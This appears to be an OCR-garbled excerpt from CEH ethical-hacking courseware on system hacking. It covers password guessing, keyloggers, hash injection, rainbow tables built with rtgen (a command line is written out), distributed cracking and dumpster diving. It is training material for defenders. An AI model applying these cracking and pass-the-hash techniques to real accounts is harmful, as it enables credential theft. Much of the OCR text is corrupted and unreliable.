t m i g h t b r e a k y o u r p a s s w o r d . A g o o d p a s s w o r d is easy t o r e m e m b e r , b u t h a rd t o guess, so y o u n e e d t o p r o t e c t y o u r p a s s w o r d by m a k in g it a p p e a r r a n d o m by i n s e r t in g such t h in g s as d ig its a n d p u n c t u a t i o n . T h e m o r e i n t r i c a t e y o u r p a s s w o r d , t h e m o r e d i f f i c u l t it b e c o m e s f o r t h e i n t r u d e r t o b r e a k . Module 05 Page 540 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Attacker FIGURE 5.5: Active Online Attack by Using Password Guessing Method S o m e o f t h e c o n s i d e r a t i o n s f o r p a s s w o r d g u e s s in g a re as f o l lo w s : 0 T akes a lo n g t i m e t o be g ue ss ed 0 R e q u ire s h u g e a m o u n t s o f n e t w o r k b a n d w i d t h 0 It can be e a sily d e t e c t e d Module 05 Page 541 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker _ Active O nline Attack: Troj an/Spy w are/K ey logger CEH Spyware is a type o f m alware th a t allows attackers to secretly gather inform ation about a person or organization W ith the help o f a Trojan, an attacker gets access to the stored passwords in the attacked com puter and is able to read personal documents, delete files, and display pictures A Keylogger is a program th a t runs in the background and allows rem ote attackers to record every keystroke vv/ Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. A ctive O n lin e A ttack: Troj an /S p y w a re /K e y lo g g e r A T r o ja n is a d e s t r u c t i v e p r o g r a m s t h a t s u b t e r f u g e as a b e n ig n a p p li c a t i o n . P r io r t o t h e in s t a l l a t i o n a n d / o r e x e c u t i o n , t h e s o f t w a r e i n i t i a ll y a p p e a rs t o p e r f o r m a d e s ir a b le f u n c t i o n , b u t in p r a c tic e it ste als i n f o r m a t i o n o r h a r m s t h e s y s te m . W i t h a T r o ja n , a t ta c k e r s m a y h a ve r e m o t e access t o t h e t a r g e t c o m p u t e r . A t t a c k e r s can h a ve access t o t h e c o m p u t e r r e m o t e l y a n d p e r f o r m v a r io u s o p e r a t i o n s t h a t a re l i m i t e d b y u s e r p r i v i le g e s o n t h e t a r g e t c o m p u t e r , by in s t a llin g t h e T r o ja n . S p y w a r e is a t y p e o f m a l w a r e t h a t can be in s t a lle d o n a c o m p u t e r t o g a t h e r i n f o r m a t i o n a b o u t t h e users o f t h e c o m p u t e r w i t h o u t t h e i r k n o w l e d g e . T his a llo w s a tt a c k e r s t o g a t h e r i n f o r m a t i o n a b o u t t h e u se r o r t h e o r g a n i z a t i o n s e c re tly . T h e p r e s e n c e o f s p y w a r e is t y p i c a l l y h id d e n f r o m t h e user, a n d can be d i f f i c u l t t o d e te c t. A k e y lo g g e r is a p r o g r a m t h a t re c o rd s all t h e k e y s t r o k e s t h a t a re t y p e d o n t h e c o m p u t e r k e y b o a r d w i t h o u t t h e k n o w l e d g e o f t h e user. O n c e k e y s tr o k e s a re lo g g e d , t h e y a re s h ip p e d t o t h e a t t a c k e r , o r h id d e n in t h e m a c h in e f o r l a t e r r e t r ie v a l. T h e a t t a c k e r t h e n s c r u t i n iz e s t h e m c a r e f u l l y f o r t h e p u r p o s e o f f i n d i n g p a s s w o r d s o r o t h e r u s e fu l i n f o r m a t i o n t h a t c o u ld be u sed t o c o m p r o m i s e t h e s y s te m . For e x a m p le , a k e y lo g g e r is c a p a b le o f r e v e a l i n g t h e c o n t e n t s o f all e m a ils c o m p o s e d b y t h e u s e r o f t h e c o m p u t e r s y s te m o n w h i c h t h e k e y lo g g e r has b e e n in s ta lle d . Module 05 Page 542 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Active O nline Attack: Hash Injection Attack A • CEH A hash injection attack allows an attacker to inject a compromised hash into a local session and use the hash to validate to network resources •• The attacker finds and extracts a logged on domain admin •• account hash ^ The attacker uses the extracted hash to log on to the domain controller Inject a compromised hash into a local session — v 1. ‫־ ״‬ 1 Attacker I k k Victim Computer Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. A ctive O n lin e A ttack: H ash In je c tio n A ttack A hash in j e c t i o n a t t a c k is t h e c o n c e p t o f i n j e c t i n g a c o m p r o m i s e d h a sh i n t o a local session a n d t h e n u sin g t h e hash t o a u t h e n t i c a t e t o t h e n e t w o r k re s o u rc e s . T his a t t a c k is d o n e s u c c e s s fu lly in f o u r s te p s . T h e y a re : © T h e h a c k e r c o m p r o m i s e s o n e w o r k s t a t i o n / s e r v e r u sin g a l o c a l / r e m o t e e x p l o i t © T h e h a c k e r e x tr a c ts lo g g e d - o n h ash e s a n d f in d s a lo g g e d - o n d o m a i n a d m in a c c o u n t hash © T h e h a c k e rs use t h e hash t o log o n t h e d o m a i n c o n t r o l l e r © T h e h a c k e r e x tr a c ts all t h e h ash es in t h e A c t i v e D i r e c t o r y d a t a b a s e a n d can n o w s a tiriz e a n y a c c o u n t in t h e d o m a i n Inject a com prom ised hash into a local session Attacker if Victim Computer FIGURE 5.6: Active Online Attack by Using Hash Injection Attack Module 05 Page 543 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker O ffline A ttack: Rainbow A ttacks I CEH Convert huge word lists It is easy to recover list of possible passwords and compare it with the precomputed hash table. passwords by comparing captured password hashes to the techniques such as Compute the hash for a like dictionary files and brute force lists into password hashes using If a match is found then the password is cracked precomputed tables rainbow tables Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited. O ffline A ttack: R ainbow A ttacks D-fra O f f lin e a tta c k s o c c u r w h e n t h e i n t r u d e r ch e cks t h e v a l i d i t y o f t h e p a s s w o r d s . He o r sh e o b s e rv e s h o w t h e p a s s w o r d is s t o r e d . If t h e u se r n a m e s a n d t h e p a s s w o r d s a re s t o r e d in a file t h a t is r e a d a b l e , it b e c o m e s easy f o r h im o r h e r t o g ain access t o t h e s y s te m . H e n ce , t h e p a s s w o r d s list m u s t be p r o t e c t e d a n d k e p t in an u n r e a d a b l e f o r m , such as an e n c r y p t e d f o r m . O ff li n e a tta c k s a re t i m e c o n s u m in g . T h e y a re su cce ssfu l b e c a u s e t h e L M h a s h e s a re v u ln e r a b l e d u e t o s m a lle r k e y s p a c e a nd s h o r t e r le n g t h . D iffe re n t p a ssw ord c r a c k in g t e c h n i q u e s are a v a ila b le o n t h e I n t e r n e t . T h e r e a re t w o t y p e s o f o f f l i n e a tta c k s t h a t an a t t a c k e r can p e r f o r m t o d is c o v e r t h e p a s s w o r d , e R a in b o w A t ta c k s 0 D i s t r i b u t e d n e t w o r k A t ta c k s ___ R ainbow A ttacks A r a i n b o w a t t a c k is t h e i m p l e m e n t a t i o n o f t h e c r y p t a n a l y t i c t i m e - m e m o r y t r a d e - o f f t e c h n i q u e . C r y p t a n a l y t i c t i m e - m e m o r y t r a d e - o f f is t h e m e t h o d t h a t r e q u ir e s less t i m e f o r c ry p ta n a ly s is . It uses a lr e a d y c a lc u la te d i n f o r m a t i o n s t o r e d in t h e m e m o r y t o c ra c k t h e c r y p t o g r a p h y . In t h e Module 05 Page 544 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker r a i n b o w a tta c k , t h e s a m e t e c h n i q u e is u se d ; t h e p a s s w o r d hash t a b l e is c r e a te d in a d v a n c e a nd s t o r e d i n t o t h e m e m o r y . Such a t a b l e is ca lle d a " r a i n b o w t a b l e . " R ainbow T ab le *Z A r a i n b o w t a b l e is a lo o k u p t a b l e s p e c ia lly u sed in r e c o v e r i n g t h e p l a i n t e x t p a s s w o r d f r o m a c i p h e r t e x t . The a t t a c k e r uses t h i s t a b l e t o lo o k f o r t h e p a s s w o r d a n d tr ie s t o r e c o v e r th e p a s s w o r d f r o m p a s s w o r d hashes. C o m p u ted H ash es — th e A n a t t a c k e r c o m p u t e s t h e hash f o r a list o f p o s s ib le p a s s w o r d s a n d c o m p a r e s it w i t h p re -c o m p u te d hash t a b l e ( r a i n b o w ta b le ) . If a m a t c h is f o u n d , t h e n t h e p a s s w o r d is cracked. C o m p are th e H ash es It is easy t o r e c o v e r p a s s w o r d s b y c o m p a r i n g c a p t u r e d p a s s w o r d h as h e s t o t h e p r e c o m p u t e d t a b le s . P re-C o m p u ted H ash es O n ly e n c r y p t e d p a s s w o r d s s h o u ld be s t o r e d in a f ile c o n t a i n i n g u s e r n a m e / e n c r y p t e d p a s s w o r d p a irs . T h e t y p e d p a s s w o r d is e n c r y p t e d u s in g t h e hash f u n c t i o n o f c r y p t o g r a p h y d u r in g t h e lo g o n p ro c e s s , a n d it is t h e n c o m p a r e d w i t h t h e p a s s w o r d t h a t is s t o r e d in t h e file . E n c r y p te d p a s s w o r d s t h a t a re s t o r e d can p r o v e useless a g a in s t d i c t i o n a r y a t t a c k s . If t h e file t h a t c o n t a in s t h e e n c r y p t e d p a s s w o r d is in a r e a d a b le f o r m a t , t h e a t t a c k e r can e asily d e t e c t t h e hash f u n c t i o n . He o r she can t h e n d e c r y p t e ach w o r d in t h e d i c t i o n a r y u sin g t h e hash f u n c t i o n , a n d t h e n c o m p a r e w i t h t h e e n c r y p t e d p a s s w o r d . T h u s t h e a t t a c k e r o b t a i n s all p a s s w o r d s t h a t a re w o r d s lis te d in t h e d ic t io n a r y . S to ra g e o f h ash e s r e q u ir e s la rg e m e m o r y sp ace such as LM " h a s h e s " r e q u i r e 3 1 0 T e r a b y te s a nd NT H ashes < 15 ch a rs r e q u ir e s 5 , 6 5 2 , 8 9 7 , 0 0 9 E x a b y te s . Use a t i m e - s p a c e t r a d e o f f t e c h n i q u e t o r e d u c e m e m o r y sp ace r e q u i r e d t o s to r e hashes. Iqazwed -> 4259cc34599c530b28a6a8f225d668590 hh021da -> c744bl716cbf8d4dd0ff4ce31al77151 9da8dasf -> 3cd696a8571a843cda453a229d741843 sodifo8sf -> 7ad7d6fa6bb4fd28ab98b3dd33261e8f Module 05 Page 545 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Tools to C reate Rainbow Tables: W inrtgen and rtg en The rtgen program need several parameters to generate a rainbow table, the syntax of the command line is: Winrtgen is a graphical Rainbow Tables Generator that supports LM, FastLM, NTLM, LMCHALL, HalfLMCHALL, NTLMCHALL, MSCACHE, MD2, MD4, MD5, SHA1, RIPEMD160, MySQL323, MySQLSHAl, CiscoPIX, ORACLE, SHA-2 (256), SHA-2 (384), and SHA-2 (512) hashes Syntax: rtgen hash_algorithm charset plaintext_len_min plaintext_len_max table index chain len chain num part index Administrator Command Prompt - rtgen ntJm loweralpha 1 7 0 1000 4000000 0 1 ~ i ° C :lls ers N ftd nin istpa tn rN D ou n lofldxNt'a inliawc t*sck‫ ־‬l . 5 ‫ ־‬u in 6 4 > rtg e n n t l n CEH Rainbow Table properties x laM cpulp ChainL ■ 1 C 24 O 1 »«lnbow ta b le n t 1™_lo1w1*dlu)M«l-y_0_l«UUx4UUlKWO_tt.rt param eters iMch a lg o r ith m : n t ln Itash le n g th : 16 :h a r o e t: ahcdof gh i.ih lm n o p a rc tu v u x v c ‫־‬hnr.net in he x : . 61 62 63 64 65 G G7 68 69 6 a 6h 6c 6d 6e 6 f 78 71 G 74 7S 76 77 78 77 7a cha rset le n g th : 26 |‫־‬h ka [#>6CO£FQHIJW.MNOPQRSrUWvW2 Key *oocf 8353C82502 keys DW. « « :• 610 :5 M 3 Succfzi tr l«I.Uy 0 978333 |978(K| loq uo nt 141 3 t a r t in tf p o in t b o gin from 0 <0x0090000000000000 < > k!»!»3fc o f 1MHHHHH ra in h o u r.h n in .1 ge ne rate d <H n 7 .6 a I 111vr: ‫ ״‬I •1M W M r » ‫ ו‬nhou f l w i n i M WU <U n V . 6 »< : 7M.HH o f 4W M M rn in h n u c ho i n i y r ‫ ««•. > ״‬r .l <8 it 7 .7 s MMW r tfc2144 o f 48W8888 m iu lw u ch« in« :!•■ ••ra te d < n 7 .6 •< 11 ( o f 4080090 rainb ow c ha lnu ge ne rate d <0 1• 7 .6 v 27680 < 41 . Oplitnil 0 4 ‫־‬ >t«p .p««d ‫ ז‬arte p‫׳‬rt‫(־‬n r1r*1pn hmr T0Ui (■•ccirpuUlun in•; M» rim «- B re w rk e *a h ttp ://w w w .o xid .it http://project-rainbowcrack.com Copyright© by E&GaUKfl. All Rights Reserved. Reproduction is Strictly Prohibited. Tools to C re a te R ainbow T ab les: W in rtg en a n d rtg e n A t t a c k e r s can c r e a te r a i n b o w t a b l e s b y u sin g f o l l o w i n g to o ls . W in rtg en v— ‫׳׳‬ S o u rc e : h t t p : / / w w w . o x i d . i t W i n r t g e n is a g ra p h ic a l R a in b o w T a b le s G e n e r a t o r t h a t h e lp s a tt a c k e r s t o c r e a t e r a i n b o w ta b le s f r o m w h i c h t h e y can c ra c k t h e h a s h e d p a s s w o r d . It s u p p o r t s L M , F a stL M , N T L M , LMCHALL, H alfL M C H A L L , N TLM C H A LL, MSCACHE, MD2, MD4, MD5, SHA1, R IP E M D 1 6 0 , M ySQL323, M y S Q L S H A l, CiscoPIX, ORACLE, SHA-2 (2 5 6 ), SHA-2 (38 4), a n d SHA-2 (5 1 2 ) hashes. Module 05 Page 546 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Rainbow Table properties Mr! Len Max Len le n Index index Char* Len in Chain Count N* of tables ‫פ‬ Charset |a h lp a Edit [ABCDEFGHUKLMNOPQRSTUVWXYZ Table properties Key space: 8353082582 keys Disk space: 810.35 MB Success probab*ty: 0.978038 (97.80*) Benchmark Optional parameter Hash speed !Administrator Step speed Table precomputation time Total precomputation time: Max cryptanalysis time: jj Benchmark Cancel | FIGURE 5.7: Winrtgen Generate Rainbow Table in Window S o u rc e : h t t p : / / p r o 1 c t - r a in b o w c r a c k . c o m e R a in b o w C r a c k is a g e n e r a l p r o p o s e i m p l e m e n t a t i o n t h a t ta k e s a d v a n ta g e o f t h e t i m e - m e m o r y t r a d e - o f f t e c h n i q u e t o c ra c k hashes. T his p r o je c t a llo w s y o u t o c ra c k a h a s h e d p a s s w o r d . T he r tg e n t o o l o f t h is p r o j e c t is u sed t o g e n e r a t e t h e r a i n b o w ta b le s . T h e r tg e n p r o g r a m n e e d s s e v e ra l p a r a m e t e r s t o g e n e r a t e a r a i n b o w t a b l e ; y o u can use f o l l o w i n g s y n t a x o f t h e c o m m a n d lin e t o g e n e r a t e r a i n b o w ta b le s : Syntax: r tg e n h a s h _ a lg o r i t h m c h a r s e t p la i n t e x t _ l e n _ m i n p l a i n t e x t _ l e n _ m a x t a b l e j n d e x c h a i n j e n c h a in _ n u m p a r t j n d e x Administrator: Command Prompt - rtgen ntlm loweralpha 1 7 0 1000 4000000 0 _ □ X nistratorDownloadsrainbowcrack‫־‬l.5‫־‬win64>rtgen ntln loweralpha 1 MUM 0 ntlm_loweralphattl1000_0_7‫־‬x4000000_0.rt parameters n: ntln 16 abcdefghijklnnopqrstuvwxyz x: 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 78 79 7a h: 26 gth range: 1 - 7 : 0x00000000 al: 8353082582 arting point begin fron 0 <0x0000000000000000) 000 rainbow chains generated <0 n 0000 rainbow chains generated <0 0000 rainbow chains generated <0 0000 rainbow chains generated <0 0000 rainbow chains generated <0 0000 rainbow chains generated <0 7.6 s> n 7.6 s) n 7.7 s) n 7.6 s) n 7.6 s) n 7.6 s) FIGURE 5.8: rtgen Generate Rainbow Table in Window Module 05 Page 547 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Distributed Network Attack C EH A Distributed N etw ork Attack (DNA) technique is used for recovering passwordprotected files using the unused processing pow er of m achines across th e ne tw o rk to decrypt passwords In this attack, a DN A m anager is installed in a central location w here machines running DN A clients can access it o v e rth e network / f ‫ץ‬ ^ f The D N A M a n a g e r DNA Manager is in s ta lle d in a coordinates th e attack and allocates small th e b a c k g ro u n d , c e n tra l lo c a tio n p o rtions o f th e key search to machines th a t are d is trib u te d over th e n e tw o rk w h e r e m a c h in e s ru n n in g o n D N A C lie n t can access it L . r D N A C lie n t ru ns in o v e r th e n e tw o rk c o n s u m in g o n ly ► un u se d p ro ce sso r ► tim e i ^ The program com bines th e processing capabilities o f all the clients connected to n e tw o rk and uses it to pe rfo rm key search to de crypt th e m j Copyright © by E&Cauactl. All Rights Reserved. Reproduction isStrictly Prohibited. D istrib u te d N etw ork A ttacks A D i s t r i b u t e d N e t w o r k A t t a c k (D N A ) is t h e t e c h n i q u e used f o r r e c o v e r i n g p a s s w o r d p r o t e c t e d file s . It u tiliz e s t h e u n u s e d p ro c e s s in g p o w e r o f m a c h in e s acro ss t h e n e t w o r k t o d e c r y p t p a s s w o r d s . In t h is a tta c k , a D N A m a n a g e r is in s t a lle d in a c e n t r a l l o c a tio n w h e r e m a c h in e s r u n n i n g D N A c lie n ts can access it o v e r t h e n e t w o r k . T h e D N A m a n a g e r c o o r d i n a t e s t h e a tta c k , a ssig n in g s m a ll p o r t i o n s o f t h e k e y s e a rc h t o m a c h in e s d i s t r i b u t e d t h r o u g h o u t t h e n e t w o r k . T h e D N A c l i e n t r u n s in t h e b a c k g r o u n d , o n l y t a k i n g u n u s e d p ro c e s s o r t i m e . T h e p r o g r a m c o m b in e s t h e p ro c e s s in g c a p a b ilit ie s o f all t h e c lie n ts c o n n e c t e d t o n e t w o r k a n d uses t h e m t o p e r f o r m a k e y s e a rch o n O ffic e 9 7 a n d 2 0 0 0 t o d e c r y p t t h e m . F ea tu res o f th e D N A : © Reads s ta tis tic s a nd g ra p h s e a sily © A d d s u s e r d ic t io n a r ie s t o c ra c k t h e p a s s w o r d © O p tim iz e s p a s s w o r d a tta c k s f o r s p e c ific la n g u a g e s © M o d i f i e s t h e u s e r d ic t io n a r ie s © C o m p r is e s o f s t e a lt h c l i e n t in s t a l l a t i o n f u n c t i o n a l i t y © A u t o m a t i c a l l y u p d a t e s c l i e n t w h i l e u p d a t i n g t h e D N A s e rv e r Module 05 Page 548 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Q Exam 312-50 Certified Ethical Hacker C o n tr o ls t h e c lie n ts a n d id e n t if ie s w o r k d o n e b y c lie n ts D N A is d iv id e d i n t o t w o m o d u le s : DNA S erver In te rfa c e T h e D N A s e r v e r i n t e r f a c e a llo w s users t o m a n a g e D N A f r o m a s e rv e r. T h e D N A s e rv e r m o d u l e p r o v id e s t h e u s e r w i t h t h e s ta tu s o f all j o b s t h a t t h e D N A s e r v e r is e x e c u tin g . T his in t e r f a c e is d iv i d e d in t o : Q C u rre n t jo bs: T h e c u r r e n t j o b q u e u e has all t h e j o b s t h a t h a ve b e e n a d d e d t o t h e list by t h e c o n t r o l l e r . T h e c u r r e n t j o b list has m a n y c o lu m n s , such as t h e i d e n t i f i c a t i o n n u m b e r t h a t has b e e n a ssig n e d b y t h e D N A t o t h e j o b , t h e n a m e o f t h e e n c r y p t e d file , t h e p a s s w o r d t h a t has b e e n used b y t h e user, t h e p a s s w o r d t h a t m a tc h e s a ke y w h i c h can u n lo c k d a ta , t h e s ta tu s o f t h e j o b , a n d v a r io u s o t h e r c o lu m n s . © Finished jo b s: T h e f in is h e d j o b list p r o v id e s i n f o r m a t i o n a b o u t t h e j o b s t h a t can be d e c r y p t e d b y in c lu d in g t h e p a s s w o r d . T h e f in is h e d j o b s list also has m a n y c o lu m n s t h a t a re s im ila r t o t h e c u r r e n t j o b list. T he se c o lu m n s in c lu d e t h e i d e n t i f i c a t i o n n u m b e r a ssig n e d by D N A t o t h e j o b , t h e n a m e o f t h e e n c r y p t e d f i l e , t h e d e c r y p t e d p a t h o f t h e file , t h e ke y used t o e n c r y p t a n d d e c r y p t t h e file , t h e d a t e a n d t i m e t h a t t h e D N A s e rv e r s t a r t e d w o r k i n g o n t h e j o b , t h e d a te a n d t i m e t h e D N A s e r v e r f in is h e d w o r k i n g o n t h e j o b , t h e e la p s e d t i m e , e tc. DNA C lie n t In te rfa c e T h e D N A c l i e n t i n t e r f a c e can be used f r o m m a n y w o r k s t a t i o n s . T h e c l i e n t s ta t is t ic s can b e e a sily c o o r d i n a t e d by u sin g t h e D N A c l i e n t in t e r fa c e . T his in t e r f a c e is a v a ila b le o n m a c h in e s w h e r e t h e D N A c l i e n t a p p li c a t i o n has b e e n in s ta lle d . T h e r e a re m a n y c o m p o n e n t s such as t h e n a m e o f t h e D N A c lie n t, t h e n a m e o f t h e g r o u p t o w h i c h t h e D N A c l i e n t b e lo n g s , t h e sta tis tic s a b o u t th e c u r r e n t jo b , and m a n y o th e r c o m p o n e n ts . N etw ork M a n a g e m e n t The N e t w o r k T r a ffic a p p li c a t i o n in W i n d o w s is u sed f o r t h e purpose o f n e tw o rk m a n a g e m e n t . T he N e t w o r k T r a ffic d ia lo g b o x is u sed t o f i n d o u t t h e n e t w o r k s p e e d t h a t D N A uses a n d e a ch w o r k u n i t le n g t h o f t h e D N A c l i e n t . U sing t h e w o r k u n i t le n g t h , a D N A c l i e n t can w o r k w i t h o u t c o n t a c t i n g t h e D N A s e rv e r. T h e D N A c l i e n t a p p li c a t i o n has t h e a b i l it y t o c o n t a c t t h e D N A s e r v e r a t t h e b e g in n in g a nd e n d in g o f t h e w o r k u n i t le n g t h . T h e u s e r can m o n i t o r t h e j o b s ta tu s q u e u e a nd t h e DNA. W h e n t h e d a ta is c o lle c te d f r o m t h e N e t w o r k T r a ffic d ia lo g box, m o d i f i c a t i o n t o t h e c l i e n t w o r k u n i t can be m a d e . W h e n t h e size o f t h e w o r k u n i t le n g t h in c re a se s, t h e s p e e d o f t h e n e t w o r k t r a f f i c d e cre a s e s . If t h e t r a f f i c has been decreased, th e c lie n t w o r k on th e jo b s w o u ld re q u ire a lo n g e r a m o u n t o f tim e . T h e re fo re , f e w e r r e q u e s ts t o t h e s e r v e r can be m a d e d u e t o t h e r e d u c t i o n in t h e b a n d w i d t h o f n e t w o r k tra ffic . Module 05 Page 549 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker _ Elcom soft D istributed Passw ord Recovery CEH Features: « Distributed password recovery over LAN, Internet, or both « Plug-in architecture allows for additional file formats » Schedule support for flexible load balancing » Install and remove password recovery clients remotely » Encrypted network communications [-!a ■ ■ IkomioA Dttnbut*! P mmokI te ovm >< v * - ‫•׳‬ ►tm 1■ a f 1 ‫ א‬MM<j + < f £ LU Elcomsoft Distributed Password Recovery breaks complex passwords, recovers strong encryption keys, and unlocks documents in a production environment _ n = n _ h ttp ://w w w . elcomsoft. com • ‫י׳יי ״י‬ ‫״־־״״־‬ • ‫"׳ ־‬ Copyright © by E&Coincil. All Rights Reserved. Reproduction isStrictly Prohibited. E lcom soft D istrib u te d P assw o rd R eco v ery S o u rc e : h t t p : / / w w w . e l c o m s o f t . c o m E lc o m s o ft D i s t r i b u t e d stro n g e n c ry p tio n P a s s w o rd R e c o v e r y a llo w s y o u t o b re a k c o m p le x p a s s w o r d s , r e c o v e r keys, a nd u n lo c k d o c u m e n t s in a p r o d u c t i o n e n v i r o n m e n t . It a llo w s t h e e x e c u t i o n o f m a t h e m a t i c a l l y i n t e n s i v e p a s s w o r d r e c o v e r y c o d e o n t h e e n o r m o u s l y p a ra lle l c o m p u t a t i o n a l e le m e n t s f o u n d in m o d e r n g r a p h i c a c c e le r a t o r s . T his e m p lo y s an i n n o v a t i v e t e c h n o l o g y t o a c c e le r a te p a s s w o r d r e c o v e r y w h e n a c o m p a t i b l e ATI o r N V ID IA g r a p h ic s c a rd is p r e s e n t in a d d i t i o n w i t h t h e C P U -o n ly m o d e . W h e n c o m p a r e d w i t h t h e p a s s w o r d r e c o v e r y m e t h o d s t h a t o n l y use t h e c o m p u t e r ' s m a in CPU, t h e GPU a c c e le r a tio n u sed b y t h is t e c h n o l o g y m a k e s p a s s w o r d r e c o v e r y fa s te r . T his s u p p o r t s p a s s w o r d r e c o v e r y o f a v a r i e t y o f a p p li c a t i o n s a n d file f o r m a t s . F ea tu res & B en e fits Q R ed uc e s p a s s w o r d r e c o v e r y t i m e Q D i s t r i b u t e d p a s s w o r d r e c o v e r y o v e r LAN, I n t e r n e t , o r b o t h Q S o lace m a n a g e m e n t f o r f l e x i b l e c o n t r o l f r o m a n y n e t w o r k e d PC © P lu g-in a r c h i t e c t u r e a llo w s f o r a d d it io n a l f ile f o r m a t s Q F le xib le q u e u e c o n t r o l a llo w s easy j o b m a n a g e m e n t Q In sta ll a n d r e m o v e p a s s w o r d r e c o v e r y c lie n ts r e m o t e l y Module 05 Page 550 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker - L fJ Elcomsoft Distributed Password Rccovcry & £ie fcdrt Apply y!«w ^ £ Agent Server Sr Add Files | Start II 1 h ‫צ‬ V ^ ^ process 0.983 % 1.087 % 0.526% S % .297 0.782 % 0.005% 0.549% filenam e S Testl.&x C Test2.>Jsx S M Test3.rfsx TcsM.xbx & TestS. >lcx 5 Reva.xisx 6 CSoft.&x Files * tjelp X Delete | ^ rena*mg tme (!) Enable (5 Doable dapsed tme 1rwi. lrwv Inn. current speed ~2h. lfimn. 121w. ? Inin. average speed 4S 6 423 219 470 42 ? 263 status recovered recovered recovered recovered notavpted recovered Connection Alerts m Cache And Log , total: 7, not started : 1 paused : 1, wartng : 0, ‫־‬ecovered : S not recovered: 0, net crypted : 1 , Attack object | Result [ C m om ent Character Groups y M utatton ® dictionary v| [Er^lish Prefix /Suffix s M a * 5>m60J: 1 1 l‫ ׳‬l □ abcdei^ttnrwpqrstuv.vxyz □ ABCDffG HJKLM PQ NO RSTLVW XYZ @ 1234567392 □ . • # U + - % ‫־‬a- « 0 0 / 1 <>0 ; : 4.? !‫׳‬ 0 Bask nSoac* ) Length no acttve tasks • onlne tocalmt .!‫|ם‬ Elcomsoft Distributed Password Recovery & Elk Ei dt ‫©י‬ yiew ^ ^ Lq Fls ie * Agents Agent Sre evr x Help , Add F l s ‫ ^ ן‬S a t v' ie tr II ■ | S flnm ieae Q| T s i j s et.dx £g T s 2 x s et.l* GS T * 3 ) s et.dx A Te M i s s.dx GiT s S.xin f et Q Rv.ix eaxs f O B pors rges 0.983% 1.067% 0.S26% 5.297% 0.782% 0.000 % X Odde | 4• 6 Enable ( > Obi * renvanng &ne • «2‫״‬h 1 mn. . 3 • ? dapsed tme l«n. 1-n. I*. 7«n. 1 2m. a/rent speed averagespeed 456 423 219 470 42 ? sau tts rcvrd eoee re o e e cvrd rcvrd eoee paused rcvrd eoee notavpted s Connection AJens m Cache And log t t l 7 n t *Ur t d: 1 C»u9cd :1, r»t1ng:0, r c v r d :5 no«re o e e :0 notcrrp«cd:l oa: , o e , eoee . cvrd , stuck | ojc bet | ReaJt ] Comment mm A n a f v to*s ocrt lchi oaot < orine * FIGURE 5.9: Elcomsoft Distributed Password Recovery Screenshot Module 05 Page 551 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures System Hacking Exam 312-50 Certified Ethical Hacker Non-Electronic Attacks Looking at either the user's keyboard or screen while he/she is logging in Searching for sensitive information at the user's trash-bins, printer trash bins, and user desk for sticky notes Convincing people to reveal the confidential information Copyright © by E&Coincil. All Rights Reserved. Reproduction isStrictly Prohibited. I I N on-E lectronic A ttacks N o n - e l e c t r o n i c a tta c k s a re also t e r m e d d o e s n 't re q u ire any te c h n ic a l k n o w le d g e n o n - t e c h n i c a l a tta c k s . T his k in d o f a t ta c k a b o u t th e m e th o d s o f in tru d in g in to a n o t h e r 's s y s te m . T h e r e f o r e , it is n a m e d a n o n - e l e c t r o n i c a tta c k . T h e r e a re f o u r ty p e s o f n o n - e l e c t r o n i c a tta c k s , w h i c h a re : social e n g in e e r in g , s h o u ld e r s u rfin g , k e y b o a r d s n if fin g , a nd d u m p s t e r d iv in g . |1 ‫ןןןן‬ D u m p ste r D iving D u m p s t e r d iv in g is a k e y a t t a c k m e t h o d t h a t t a r g e t s u p o n a s u b s t a n t i a l f a i l u r e in c o m p u t e r s e c u r it y : t h e v e r y i n f o r m a t i o n t h a t p e o p le c ra ve , p r o t e c t , a n d d e v o t e d l y s e c u re can be a t t a in e d b y a lm o s t a n y o n e w i l l i n g t o s c r u t i n iz e g a r b a g e . It a llo w s y o u t o g a t h e r i n f o r m a t i o n a b o u t t h e t a r g e t 's p a s s w o r d s by l o o k in g t h r o u g h t h e tr a s h . This l o w - t e c h a t t a c k t y p e has m a n y i m p lic a t io n s . D ue t o less s e c u r it y t h a n t h e r e is t o d a y , d u m p s t e r d iv in g w a s a c t u a l ly q u i t e p o p u l a r in t h e 1 